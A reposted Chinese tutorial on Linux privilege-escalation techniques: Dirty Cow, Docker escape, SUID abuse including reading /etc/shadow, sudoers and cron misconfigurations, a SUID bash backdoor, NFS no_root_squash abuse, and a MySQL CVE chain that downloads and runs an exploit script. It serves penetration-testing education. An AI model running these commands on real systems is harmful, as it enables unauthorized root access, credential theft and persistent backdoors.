[[373960]]

本文轉載自微信公眾號「Bypass」，作者Bypass 。轉載本文請聯系Bypass公眾號。

在滲透測試過程中，提升權限是非常關鍵的一步，攻擊者往往可以通過利用內核漏洞/權限配置不當/root權限運行的服務等方式尋找突破點，來達到提升權限的目的。

1、內核漏洞提權

提起內核漏洞提權就不得不提到臟牛漏洞(Dirty Cow)，是存在時間最長且影響范圍最廣的漏洞之一。低權限用戶可以利用該漏洞實現本地提權，同時可以通過該漏洞實現Docker容器逃逸，獲得root權限的shell。

1.1 本地內核提權

(1)檢測內核版本

# 查看系統發行版本 
lsb_release -a 
# 查看內核版本 
uname -a 

 

(2) 下載，編譯生成exp文件

bypass@ubuntu:~$ make 

 

(3)執行成功，返回一個root權限的shell。

 

1.2 利用DirtyCow漏洞實現Docker逃逸

(1)進入容器，編譯POC并執行：

 

(2)在攻擊者機器上，成功接收到宿主機反彈的shell。

 

1.3 Linux提權輔助工具

github項目地址：

https://github.com/mzet-/linux-exploit-suggester.git 

(1)根據操作系統版本號自動查找相應提權腳本

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh 

 

(2)根據提示下載poc，編譯執行。

 

2、利用SUID提權

SUID是一種特殊權限，可以讓調用者在執行過程中暫時獲得該文件擁有者的權限。如果可以找到并運行root用戶所擁有的SUID的文件，那么就可以在運行該文件的時候獲得root用戶權限。

(1)在Linux中查找可以用來提權的SUID文件

find / -perm -u=s -type f 2>/dev/null 

 

(2)通過find以root權限執行命令

 

可用作Linux提權的命令及其姿勢:

#Find 
find pentestlab -exec whoami \; 
#Vim 
vim.tiny /etc/shadow 
#awk 
awk 'BEGIN{system("whoami")}' 
#curl 
curl file:///etc/shadow 
#Bash 
bash -p   
#Less 
less /etc/passwd 
#Nmap 
nmap --interactive 

3、SUDO提權

普通用戶在使用sudo執行命令的過程中，會以root方式執行命令。在很多場景里，管理員為了運維管理方便，sudoer配置文件錯誤導致提權。

(1)設置sudo免密碼

$vi /etc/sudoers 
在最后一行添加：bypass ALL=(ALL:ALL) NOPASSWD:ALL 

(2)查看sudo的權限

 

4、計劃任務

如果可以找到可以有權限修改的計劃任務腳本，就可以修改腳本實現提權。本質上，就是文件權限配置不當。

(1)查看計劃任務，找到有修改權限的計劃任務腳本。

ls -l /etc/cron* 
more /etc/crontab 

 

(2)在mysqlback.sh 添加 SUID shell后門，當定時任務以root再次執行的時候，可以獲取root權限。

cp /bin/bash /tmp/shell 
chmod u+s /tmp/shell 

 

5、NFS提權

當服務器中存在NFS共享，開啟no_root_squash選項時，如果客戶端使用的是root用戶，那么對于共享目錄來說，該客戶端就有root權限，可以使用它來提升權限。

(1)查看NFS服務器上的共享目錄

sudo showmount -e 10.1.1.233 

 

(2)創建本地掛載目錄，掛載共享目錄。使用攻擊者本地root權限創建Suid shell。

sudo mkdir -p /tmp/data 
sudo mount -t nfs 10.1.1.233:/home/bypass /tmp/data 
cp /bin/bash /tmp/data/shell 
chmod u+s /tmp/data/shell 

 

(3)回到要提權的服務器上，使用普通用戶使用-p參數來獲取root權限。

 

6、MySQL提權

MySQL提權方式有UDF提權，MOF提權，寫入啟動項提權等方式，但比較有意思的是CVE-2016-6663、CVE-2016-6664組合利用的提取場景，可以將一個www-data權限提升到root權限。

(1)利用CVE-2016-6663將www-data權限提升為mysql權限：

cd /var/www/html/ 
gcc mysql-privesc-race.c -o mysql-privesc-race -I/usr/include/mysql -lmysqlclient 
./mysql-privesc-race test 123456 localhost testdb 

(2)利用CVE-2016-6664將Mysql權限提升為root權限：

wget http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh 
chmod 777 mysql-chowned.sh 
./mysql-chowned.sh /var/log/mysql/error.log